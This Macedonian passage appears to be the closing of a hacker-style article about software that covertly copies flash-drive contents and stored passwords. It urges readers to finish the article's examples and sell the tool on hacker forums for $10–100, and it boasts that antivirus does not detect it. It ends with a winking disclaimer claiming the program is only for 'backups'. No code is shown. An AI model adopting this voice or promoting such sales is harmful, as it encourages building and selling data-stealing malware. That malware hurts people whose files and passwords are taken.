    На многу хакерски форуми има многу огласи за продажба на софтвер од ваков вид. Цените варираат - од 10 до 100 долари. Со финализирање на примерите дискутирани во статијата, можете да заработите пари за кора црн леб со кавијар. Повторувам, главната работа е креативно да му пристапиме на прашањето и сè дефинитивно ќе успее. Повторно, не се открива со антивируси;).

    Предупредување!

    Оваа програма ја користиме исклучиво за навремена резервна копија на содржината на флеш драјвовите на диск и резервна копија на лозинки на флеш-уред. Што мислевте? Незаконската употреба на ваков софтвер е казнива!